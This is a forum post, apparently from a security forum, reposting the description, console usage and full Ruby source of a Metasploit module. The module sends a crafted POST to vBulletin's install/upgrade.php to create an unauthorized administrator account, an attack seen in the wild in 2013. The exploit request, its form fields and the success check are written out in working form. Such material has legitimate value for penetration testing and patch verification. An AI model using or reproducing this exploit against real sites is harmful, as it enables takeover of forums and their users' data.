Jump to content
Fi8sVrs

vBulletin Administrator Account Creation

Recommended Posts

  • Active Members

This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to create a new administrator account, as exploited in the wild on October 2013. This module has been tested successfully on vBulletin 4.1.5 and 4.1.0.

Module Name

auxiliary/admin/http/vbulletin_upgrade_admin

Authors

Unknown

juan vazquez <juan.vazquez [at] metasploit.com>

References

URL: https://rstforums.com/forum/76476-dangerous-vbulletin-exploit-wild.rst

URL: Dangerous vBulletin exploit in the wild

URL: Potential vBulletin Exploit (vBulletin 4.1+, vBulletin 5+) - vBulletin Community Forum

Module Options

To display the available options, load the module within the Metasploit console and run the commands 'show options' or 'show advanced':

msf > use auxiliary/admin/http/vbulletin_upgrade_admin
msf auxiliary(vbulletin_upgrade_admin) > show actions
...actions...
msf auxiliary(vbulletin_upgrade_admin) > set ACTION <action-name>
msf auxiliary(vbulletin_upgrade_admin) > show options
...show and set options...
msf auxiliary(vbulletin_upgrade_admin) > run

Development

Source Code

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report

def initialize(info = {})
super(update_info(info,
'Name' => 'vBulletin Administrator Account Creation',
'Description' => %q{
This module abuses the "install/upgrade.php" component on vBulletin 4.1+ and 4.5+ to
create a new administrator account, as exploited in the wild on October 2013. This module
has been tested successfully on vBulletin 4.1.5 and 4.1.0.
},
'Author' =>
[
'Unknown', # Vulnerability discoverer? found in the wild
'juan vazquez' #metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://www.net-security.org/secworld.php?id=15743' ],
[ 'URL', 'http://www.vbulletin.com/forum/forum/vbulletin-announcements/vbulletin-announcements_aa/3991423-potential-vbulletin-exploit-vbulletin-4-1-vbulletin-5']
],
'DisclosureDate' => 'Oct 09 2013'))

register_options(
[
OptString.new('TARGETURI', [ true, "The vbulletin URI", '/']),
OptString.new('USERNAME', [true, 'The username for the new admin account', 'msf']),
OptString.new('PASSWORD', [true, 'The password for the new admin account', 'password']),
OptString.new('EMAIL', [true, 'The email for the new admin account', 'msf@email.loc'])
], self.class)
end

def user
datastore["USERNAME"]
end

def pass
datastore["PASSWORD"]
end

def run

if user == pass
print_error("#{peer} - Please select a password different than the username")
return
end

print_status("#{peer} - Trying a new admin vBulletin account...")

res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "install", "upgrade.php"),
'method' =>'POST',
'vars_post' => {
"version" => "install",
"response" => "true",
"checktable" => "false",
"firstrun" => "false",
"step" => "7",
"startat" => "0",
"only" => "false",
"options[skiptemplatemerge]" => "0",
"reponse" => "yes",
"htmlsubmit" => "1",
"htmldata[username]" => user,
"htmldata[password]" => pass,
"htmldata[confirmpassword]" => pass,
"htmldata[email]" => datastore["EMAIL"]
},
'headers' => {
"X-Requested-With" => "XMLHttpRequest"
}
})

if res and res.code == 200 and res.body =~ /Administrator account created/
print_good("#{peer} - Admin account with credentials #{user}:#{pass} successfully created")
report_auth_info(
:host => rhost,
:port => rport,
:sname => 'http',
:user => user,
:pass => pass,
:active => true,
:proof => res.body
)
else
print_error("#{peer} - Admin account creation failed")
end
end
end

History

vBulletin Administrator Account Creation | Rapid7

Edited by Fi8sVrs
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...